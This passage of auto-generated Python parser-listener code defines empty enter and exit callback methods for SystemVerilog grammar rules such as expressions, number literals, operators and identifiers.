def enterConstant_mintypmax_expression(self, ctx:SystemVerilogParser.Constant_mintypmax_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_mintypmax_expression.
def exitConstant_mintypmax_expression(self, ctx:SystemVerilogParser.Constant_mintypmax_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_param_expression.
def enterConstant_param_expression(self, ctx:SystemVerilogParser.Constant_param_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_param_expression.
def exitConstant_param_expression(self, ctx:SystemVerilogParser.Constant_param_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#param_expression.
def enterParam_expression(self, ctx:SystemVerilogParser.Param_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#param_expression.
def exitParam_expression(self, ctx:SystemVerilogParser.Param_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_range_expression.
def enterConstant_range_expression(self, ctx:SystemVerilogParser.Constant_range_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_range_expression.
def exitConstant_range_expression(self, ctx:SystemVerilogParser.Constant_range_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_part_select_range.
def enterConstant_part_select_range(self, ctx:SystemVerilogParser.Constant_part_select_rangeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_part_select_range.
def exitConstant_part_select_range(self, ctx:SystemVerilogParser.Constant_part_select_rangeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_range.
def enterConstant_range(self, ctx:SystemVerilogParser.Constant_rangeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_range.
def exitConstant_range(self, ctx:SystemVerilogParser.Constant_rangeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_indexed_range.
def enterConstant_indexed_range(self, ctx:SystemVerilogParser.Constant_indexed_rangeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_indexed_range.
def exitConstant_indexed_range(self, ctx:SystemVerilogParser.Constant_indexed_rangeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#string_or_expression.
def enterString_or_expression(self, ctx:SystemVerilogParser.String_or_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#string_or_expression.
def exitString_or_expression(self, ctx:SystemVerilogParser.String_or_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#expression.
def enterExpression(self, ctx:SystemVerilogParser.ExpressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#expression.
def exitExpression(self, ctx:SystemVerilogParser.ExpressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tagged_union_expression.
def enterTagged_union_expression(self, ctx:SystemVerilogParser.Tagged_union_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tagged_union_expression.
def exitTagged_union_expression(self, ctx:SystemVerilogParser.Tagged_union_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#value_range.
def enterValue_range(self, ctx:SystemVerilogParser.Value_rangeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#value_range.
def exitValue_range(self, ctx:SystemVerilogParser.Value_rangeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#mintypmax_expression.
def enterMintypmax_expression(self, ctx:SystemVerilogParser.Mintypmax_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#mintypmax_expression.
def exitMintypmax_expression(self, ctx:SystemVerilogParser.Mintypmax_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_path_conditional_expression.
def enterModule_path_conditional_expression(self, ctx:SystemVerilogParser.Module_path_conditional_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_path_conditional_expression.
def exitModule_path_conditional_expression(self, ctx:SystemVerilogParser.Module_path_conditional_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_path_expression.
def enterModule_path_expression(self, ctx:SystemVerilogParser.Module_path_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_path_expression.
def exitModule_path_expression(self, ctx:SystemVerilogParser.Module_path_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_path_mintypmax_expression.
def enterModule_path_mintypmax_expression(self, ctx:SystemVerilogParser.Module_path_mintypmax_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_path_mintypmax_expression.
def exitModule_path_mintypmax_expression(self, ctx:SystemVerilogParser.Module_path_mintypmax_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#part_select_range.
def enterPart_select_range(self, ctx:SystemVerilogParser.Part_select_rangeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#part_select_range.
def exitPart_select_range(self, ctx:SystemVerilogParser.Part_select_rangeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#indexed_range.
def enterIndexed_range(self, ctx:SystemVerilogParser.Indexed_rangeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#indexed_range.
def exitIndexed_range(self, ctx:SystemVerilogParser.Indexed_rangeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#genvar_expression.
def enterGenvar_expression(self, ctx:SystemVerilogParser.Genvar_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#genvar_expression.
def exitGenvar_expression(self, ctx:SystemVerilogParser.Genvar_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_primary.
def enterConstant_primary(self, ctx:SystemVerilogParser.Constant_primaryContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_primary.
def exitConstant_primary(self, ctx:SystemVerilogParser.Constant_primaryContext):
pass
# Enter a parse tree produced by SystemVerilogParser#primary.
def enterPrimary(self, ctx:SystemVerilogParser.PrimaryContext):
pass
# Exit a parse tree produced by SystemVerilogParser#primary.
def exitPrimary(self, ctx:SystemVerilogParser.PrimaryContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_path_primary.
def enterModule_path_primary(self, ctx:SystemVerilogParser.Module_path_primaryContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_path_primary.
def exitModule_path_primary(self, ctx:SystemVerilogParser.Module_path_primaryContext):
pass
# Enter a parse tree produced by SystemVerilogParser#class_qualifier.
def enterClass_qualifier(self, ctx:SystemVerilogParser.Class_qualifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#class_qualifier.
def exitClass_qualifier(self, ctx:SystemVerilogParser.Class_qualifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#range_expression.
def enterRange_expression(self, ctx:SystemVerilogParser.Range_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#range_expression.
def exitRange_expression(self, ctx:SystemVerilogParser.Range_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#primary_literal.
def enterPrimary_literal(self, ctx:SystemVerilogParser.Primary_literalContext):
pass
# Exit a parse tree produced by SystemVerilogParser#primary_literal.
def exitPrimary_literal(self, ctx:SystemVerilogParser.Primary_literalContext):
pass
# Enter a parse tree produced by SystemVerilogParser#time_literal.
def enterTime_literal(self, ctx:SystemVerilogParser.Time_literalContext):
pass
# Exit a parse tree produced by SystemVerilogParser#time_literal.
def exitTime_literal(self, ctx:SystemVerilogParser.Time_literalContext):
pass
# Enter a parse tree produced by SystemVerilogParser#time_unit.
def enterTime_unit(self, ctx:SystemVerilogParser.Time_unitContext):
pass
# Exit a parse tree produced by SystemVerilogParser#time_unit.
def exitTime_unit(self, ctx:SystemVerilogParser.Time_unitContext):
pass
# Enter a parse tree produced by SystemVerilogParser#implicit_class_handle.
def enterImplicit_class_handle(self, ctx:SystemVerilogParser.Implicit_class_handleContext):
pass
# Exit a parse tree produced by SystemVerilogParser#implicit_class_handle.
def exitImplicit_class_handle(self, ctx:SystemVerilogParser.Implicit_class_handleContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bit_select.
def enterBit_select(self, ctx:SystemVerilogParser.Bit_selectContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bit_select.
def exitBit_select(self, ctx:SystemVerilogParser.Bit_selectContext):
pass
# Enter a parse tree produced by SystemVerilogParser#select.
def enterSelect(self, ctx:SystemVerilogParser.SelectContext):
pass
# Exit a parse tree produced by SystemVerilogParser#select.
def exitSelect(self, ctx:SystemVerilogParser.SelectContext):
pass
# Enter a parse tree produced by SystemVerilogParser#nonrange_select.
def enterNonrange_select(self, ctx:SystemVerilogParser.Nonrange_selectContext):
pass
# Exit a parse tree produced by SystemVerilogParser#nonrange_select.
def exitNonrange_select(self, ctx:SystemVerilogParser.Nonrange_selectContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_bit_select.
def enterConstant_bit_select(self, ctx:SystemVerilogParser.Constant_bit_selectContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_bit_select.
def exitConstant_bit_select(self, ctx:SystemVerilogParser.Constant_bit_selectContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_select.
def enterConstant_select(self, ctx:SystemVerilogParser.Constant_selectContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_select.
def exitConstant_select(self, ctx:SystemVerilogParser.Constant_selectContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_let_expression.
def enterConstant_let_expression(self, ctx:SystemVerilogParser.Constant_let_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_let_expression.
def exitConstant_let_expression(self, ctx:SystemVerilogParser.Constant_let_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#net_lvalue.
def enterNet_lvalue(self, ctx:SystemVerilogParser.Net_lvalueContext):
pass
# Exit a parse tree produced by SystemVerilogParser#net_lvalue.
def exitNet_lvalue(self, ctx:SystemVerilogParser.Net_lvalueContext):
pass
# Enter a parse tree produced by SystemVerilogParser#variable_lvalue.
def enterVariable_lvalue(self, ctx:SystemVerilogParser.Variable_lvalueContext):
pass
# Exit a parse tree produced by SystemVerilogParser#variable_lvalue.
def exitVariable_lvalue(self, ctx:SystemVerilogParser.Variable_lvalueContext):
pass
# Enter a parse tree produced by SystemVerilogParser#nonrange_variable_lvalue.
def enterNonrange_variable_lvalue(self, ctx:SystemVerilogParser.Nonrange_variable_lvalueContext):
pass
# Exit a parse tree produced by SystemVerilogParser#nonrange_variable_lvalue.
def exitNonrange_variable_lvalue(self, ctx:SystemVerilogParser.Nonrange_variable_lvalueContext):
pass
# Enter a parse tree produced by SystemVerilogParser#unary_operator.
def enterUnary_operator(self, ctx:SystemVerilogParser.Unary_operatorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#unary_operator.
def exitUnary_operator(self, ctx:SystemVerilogParser.Unary_operatorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#binary_operator.
def enterBinary_operator(self, ctx:SystemVerilogParser.Binary_operatorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#binary_operator.
def exitBinary_operator(self, ctx:SystemVerilogParser.Binary_operatorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#inc_or_dec_operator.
def enterInc_or_dec_operator(self, ctx:SystemVerilogParser.Inc_or_dec_operatorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#inc_or_dec_operator.
def exitInc_or_dec_operator(self, ctx:SystemVerilogParser.Inc_or_dec_operatorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#unary_module_path_operator.
def enterUnary_module_path_operator(self, ctx:SystemVerilogParser.Unary_module_path_operatorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#unary_module_path_operator.
def exitUnary_module_path_operator(self, ctx:SystemVerilogParser.Unary_module_path_operatorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#binary_module_path_operator.
def enterBinary_module_path_operator(self, ctx:SystemVerilogParser.Binary_module_path_operatorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#binary_module_path_operator.
def exitBinary_module_path_operator(self, ctx:SystemVerilogParser.Binary_module_path_operatorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#number.
def enterNumber(self, ctx:SystemVerilogParser.NumberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#number.
def exitNumber(self, ctx:SystemVerilogParser.NumberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#integral_number.
def enterIntegral_number(self, ctx:SystemVerilogParser.Integral_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#integral_number.
def exitIntegral_number(self, ctx:SystemVerilogParser.Integral_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#decimal_number.
def enterDecimal_number(self, ctx:SystemVerilogParser.Decimal_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#decimal_number.
def exitDecimal_number(self, ctx:SystemVerilogParser.Decimal_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#binary_number.
def enterBinary_number(self, ctx:SystemVerilogParser.Binary_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#binary_number.
def exitBinary_number(self, ctx:SystemVerilogParser.Binary_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#octal_number.
def enterOctal_number(self, ctx:SystemVerilogParser.Octal_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#octal_number.
def exitOctal_number(self, ctx:SystemVerilogParser.Octal_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hex_number.
def enterHex_number(self, ctx:SystemVerilogParser.Hex_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hex_number.
def exitHex_number(self, ctx:SystemVerilogParser.Hex_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#sign.
def enterSign(self, ctx:SystemVerilogParser.SignContext):
pass
# Exit a parse tree produced by SystemVerilogParser#sign.
def exitSign(self, ctx:SystemVerilogParser.SignContext):
pass
# Enter a parse tree produced by SystemVerilogParser#size.
def enterSize(self, ctx:SystemVerilogParser.SizeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#size.
def exitSize(self, ctx:SystemVerilogParser.SizeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#non_zero_unsigned_number.
def enterNon_zero_unsigned_number(self, ctx:SystemVerilogParser.Non_zero_unsigned_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#non_zero_unsigned_number.
def exitNon_zero_unsigned_number(self, ctx:SystemVerilogParser.Non_zero_unsigned_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#real_number.
def enterReal_number(self, ctx:SystemVerilogParser.Real_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#real_number.
def exitReal_number(self, ctx:SystemVerilogParser.Real_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#fixed_point_number.
def enterFixed_point_number(self, ctx:SystemVerilogParser.Fixed_point_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#fixed_point_number.
def exitFixed_point_number(self, ctx:SystemVerilogParser.Fixed_point_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#exp.
def enterExp(self, ctx:SystemVerilogParser.ExpContext):
pass
# Exit a parse tree produced by SystemVerilogParser#exp.
def exitExp(self, ctx:SystemVerilogParser.ExpContext):
pass
# Enter a parse tree produced by SystemVerilogParser#unsigned_number.
def enterUnsigned_number(self, ctx:SystemVerilogParser.Unsigned_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#unsigned_number.
def exitUnsigned_number(self, ctx:SystemVerilogParser.Unsigned_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#binary_value.
def enterBinary_value(self, ctx:SystemVerilogParser.Binary_valueContext):
pass
# Exit a parse tree produced by SystemVerilogParser#binary_value.
def exitBinary_value(self, ctx:SystemVerilogParser.Binary_valueContext):
pass
# Enter a parse tree produced by SystemVerilogParser#octal_value.
def enterOctal_value(self, ctx:SystemVerilogParser.Octal_valueContext):
pass
# Exit a parse tree produced by SystemVerilogParser#octal_value.
def exitOctal_value(self, ctx:SystemVerilogParser.Octal_valueContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hex_value.
def enterHex_value(self, ctx:SystemVerilogParser.Hex_valueContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hex_value.
def exitHex_value(self, ctx:SystemVerilogParser.Hex_valueContext):
pass
# Enter a parse tree produced by SystemVerilogParser#decimal_base.
def enterDecimal_base(self, ctx:SystemVerilogParser.Decimal_baseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#decimal_base.
def exitDecimal_base(self, ctx:SystemVerilogParser.Decimal_baseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#binary_base.
def enterBinary_base(self, ctx:SystemVerilogParser.Binary_baseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#binary_base.
def exitBinary_base(self, ctx:SystemVerilogParser.Binary_baseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#octal_base.
def enterOctal_base(self, ctx:SystemVerilogParser.Octal_baseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#octal_base.
def exitOctal_base(self, ctx:SystemVerilogParser.Octal_baseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hex_base.
def enterHex_base(self, ctx:SystemVerilogParser.Hex_baseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hex_base.
def exitHex_base(self, ctx:SystemVerilogParser.Hex_baseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#non_zero_decimal_digit.
def enterNon_zero_decimal_digit(self, ctx:SystemVerilogParser.Non_zero_decimal_digitContext):
pass
# Exit a parse tree produced by SystemVerilogParser#non_zero_decimal_digit.
def exitNon_zero_decimal_digit(self, ctx:SystemVerilogParser.Non_zero_decimal_digitContext):
pass
# Enter a parse tree produced by SystemVerilogParser#decimal_digit.
def enterDecimal_digit(self, ctx:SystemVerilogParser.Decimal_digitContext):
pass
# Exit a parse tree produced by SystemVerilogParser#decimal_digit.
def exitDecimal_digit(self, ctx:SystemVerilogParser.Decimal_digitContext):
pass
# Enter a parse tree produced by SystemVerilogParser#binary_digit.
def enterBinary_digit(self, ctx:SystemVerilogParser.Binary_digitContext):
pass
# Exit a parse tree produced by SystemVerilogParser#binary_digit.
def exitBinary_digit(self, ctx:SystemVerilogParser.Binary_digitContext):
pass
# Enter a parse tree produced by SystemVerilogParser#octal_digit.
def enterOctal_digit(self, ctx:SystemVerilogParser.Octal_digitContext):
pass
# Exit a parse tree produced by SystemVerilogParser#octal_digit.
def exitOctal_digit(self, ctx:SystemVerilogParser.Octal_digitContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hex_digit.
def enterHex_digit(self, ctx:SystemVerilogParser.Hex_digitContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hex_digit.
def exitHex_digit(self, ctx:SystemVerilogParser.Hex_digitContext):
pass
# Enter a parse tree produced by SystemVerilogParser#x_digit.
def enterX_digit(self, ctx:SystemVerilogParser.X_digitContext):
pass
# Exit a parse tree produced by SystemVerilogParser#x_digit.
def exitX_digit(self, ctx:SystemVerilogParser.X_digitContext):
pass
# Enter a parse tree produced by SystemVerilogParser#z_digit.
def enterZ_digit(self, ctx:SystemVerilogParser.Z_digitContext):
pass
# Exit a parse tree produced by SystemVerilogParser#z_digit.
def exitZ_digit(self, ctx:SystemVerilogParser.Z_digitContext):
pass
# Enter a parse tree produced by SystemVerilogParser#unbased_unsized_literal.
def enterUnbased_unsized_literal(self, ctx:SystemVerilogParser.Unbased_unsized_literalContext):
pass
# Exit a parse tree produced by SystemVerilogParser#unbased_unsized_literal.
def exitUnbased_unsized_literal(self, ctx:SystemVerilogParser.Unbased_unsized_literalContext):
pass
# Enter a parse tree produced by SystemVerilogParser#string_literal.
def enterString_literal(self, ctx:SystemVerilogParser.String_literalContext):
pass
# Exit a parse tree produced by SystemVerilogParser#string_literal.
def exitString_literal(self, ctx:SystemVerilogParser.String_literalContext):
pass
# Enter a parse tree produced by SystemVerilogParser#attribute_instance.
def enterAttribute_instance(self, ctx:SystemVerilogParser.Attribute_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#attribute_instance.
def exitAttribute_instance(self, ctx:SystemVerilogParser.Attribute_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#attr_spec.
def enterAttr_spec(self, ctx:SystemVerilogParser.Attr_specContext):
pass
# Exit a parse tree produced by SystemVerilogParser#attr_spec.
def exitAttr_spec(self, ctx:SystemVerilogParser.Attr_specContext):
pass
# Enter a parse tree produced by SystemVerilogParser#attr_name.
def enterAttr_name(self, ctx:SystemVerilogParser.Attr_nameContext):
pass
# Exit a parse tree produced by SystemVerilogParser#attr_name.
def exitAttr_name(self, ctx:SystemVerilogParser.Attr_nameContext):
pass
# Enter a parse tree produced by SystemVerilogParser#array_identifier.
def enterArray_identifier(self, ctx:SystemVerilogParser.Array_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#array_identifier.
def exitArray_identifier(self, ctx:SystemVerilogParser.Array_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#block_identifier.
def enterBlock_identifier(self, ctx:SystemVerilogParser.Block_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#block_identifier.
def exitBlock_identifier(self, ctx:SystemVerilogParser.Block_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bin_identifier.
def enterBin_identifier(self, ctx:SystemVerilogParser.Bin_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bin_identifier.
def exitBin_identifier(self, ctx:SystemVerilogParser.Bin_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#c_identifier.
def enterC_identifier(self, ctx:SystemVerilogParser.C_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#c_identifier.
def exitC_identifier(self, ctx:SystemVerilogParser.C_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cell_identifier.
def enterCell_identifier(self, ctx:SystemVerilogParser.Cell_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cell_identifier.
def exitCell_identifier(self, ctx:SystemVerilogParser.Cell_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_identifier.
def enterChecker_identifier(self, ctx:SystemVerilogParser.Checker_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_identifier.
def exitChecker_identifier(self, ctx:SystemVerilogParser.Checker_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#class_identifier.
def enterClass_identifier(self, ctx:SystemVerilogParser.Class_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#class_identifier.
def exitClass_identifier(self, ctx:SystemVerilogParser.Class_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#class_variable_identifier.
def enterClass_variable_identifier(self, ctx:SystemVerilogParser.Class_variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#class_variable_identifier.
def exitClass_variable_identifier(self, ctx:SystemVerilogParser.Class_variable_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#clocking_identifier.
def enterClocking_identifier(self, ctx:SystemVerilogParser.Clocking_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#clocking_identifier.
def exitClocking_identifier(self, ctx:SystemVerilogParser.Clocking_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#config_identifier.
def enterConfig_identifier(self, ctx:SystemVerilogParser.Config_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#config_identifier.
def exitConfig_identifier(self, ctx:SystemVerilogParser.Config_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#const_identifier.
def enterConst_identifier(self, ctx:SystemVerilogParser.Const_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#const_identifier.
def exitConst_identifier(self, ctx:SystemVerilogParser.Const_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constraint_identifier.
def enterConstraint_identifier(self, ctx:SystemVerilogParser.Constraint_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constraint_identifier.
def exitConstraint_identifier(self, ctx:SystemVerilogParser.Constraint_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#covergroup_identifier.
def enterCovergroup_identifier(self, ctx:SystemVerilogParser.Covergroup_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#covergroup_identifier.
def exitCovergroup_identifier(self, ctx:SystemVerilogParser.Covergroup_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#covergroup_variable_identifier.
def enterCovergroup_variable_identifier(self, ctx:SystemVerilogParser.Covergroup_variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#covergroup_variable_identifier.
def exitCovergroup_variable_identifier(self, ctx:SystemVerilogParser.Covergroup_variable_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cover_point_identifier.
def enterCover_point_identifier(self, ctx:SystemVerilogParser.Cover_point_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cover_point_identifier.
def exitCover_point_identifier(self, ctx:SystemVerilogParser.Cover_point_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cross_identifier.
def enterCross_identifier(self, ctx:SystemVerilogParser.Cross_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cross_identifier.
def exitCross_identifier(self, ctx:SystemVerilogParser.Cross_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#dynamic_array_variable_identifier.
def enterDynamic_array_variable_identifier(self, ctx:SystemVerilogParser.Dynamic_array_variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#dynamic_array_variable_identifier.
def exitDynamic_array_variable_identifier(self, ctx:SystemVerilogParser.Dynamic_array_variable_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#enum_identifier.
def enterEnum_identifier(self, ctx:SystemVerilogParser.Enum_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#enum_identifier.
def exitEnum_identifier(self, ctx:SystemVerilogParser.Enum_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#formal_identifier.
def enterFormal_identifier(self, ctx:SystemVerilogParser.Formal_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#formal_identifier.
def exitFormal_identifier(self, ctx:SystemVerilogParser.Formal_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#formal_port_identifier.
def enterFormal_port_identifier(self, ctx:SystemVerilogParser.Formal_port_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#formal_port_identifier.
def exitFormal_port_identifier(self, ctx:SystemVerilogParser.Formal_port_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#function_identifier.
def enterFunction_identifier(self, ctx:SystemVerilogParser.Function_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#function_identifier.
def exitFunction_identifier(self, ctx:SystemVerilogParser.Function_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#generate_block_identifier.
def enterGenerate_block_identifier(self, ctx:SystemVerilogParser.Generate_block_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#generate_block_identifier.
def exitGenerate_block_identifier(self, ctx:SystemVerilogParser.Generate_block_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#genvar_identifier.
def enterGenvar_identifier(self, ctx:SystemVerilogParser.Genvar_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#genvar_identifier.
def exitGenvar_identifier(self, ctx:SystemVerilogParser.Genvar_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_array_identifier.
def enterHierarchical_array_identifier(self, ctx:SystemVerilogParser.Hierarchical_array_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_array_identifier.
def exitHierarchical_array_identifier(self, ctx:SystemVerilogParser.Hierarchical_array_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_block_identifier.
def enterHierarchical_block_identifier(self, ctx:SystemVerilogParser.Hierarchical_block_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_block_identifier.
def exitHierarchical_block_identifier(self, ctx:SystemVerilogParser.Hierarchical_block_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_event_identifier.
def enterHierarchical_event_identifier(self, ctx:SystemVerilogParser.Hierarchical_event_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_event_identifier.
def exitHierarchical_event_identifier(self, ctx:SystemVerilogParser.Hierarchical_event_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_identifier.
def enterHierarchical_identifier(self, ctx:SystemVerilogParser.Hierarchical_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_identifier.
def exitHierarchical_identifier(self, ctx:SystemVerilogParser.Hierarchical_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_net_identifier.
def enterHierarchical_net_identifier(self, ctx:SystemVerilogParser.Hierarchical_net_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_net_identifier.
def exitHierarchical_net_identifier(self, ctx:SystemVerilogParser.Hierarchical_net_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_parameter_identifier.
def enterHierarchical_parameter_identifier(self, ctx:SystemVerilogParser.Hierarchical_parameter_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_parameter_identifier.
def exitHierarchical_parameter_identifier(self, ctx:SystemVerilogParser.Hierarchical_parameter_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_property_identifier.
def enterHierarchical_property_identifier(self, ctx:SystemVerilogParser.Hierarchical_property_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_property_identifier.
def exitHierarchical_property_identifier(self, ctx:SystemVerilogParser.Hierarchical_property_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_sequence_identifier.
def enterHierarchical_sequence_identifier(self, ctx:SystemVerilogParser.Hierarchical_sequence_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_sequence_identifier.
def exitHierarchical_sequence_identifier(self, ctx:SystemVerilogParser.Hierarchical_sequence_identifierContext):
pass
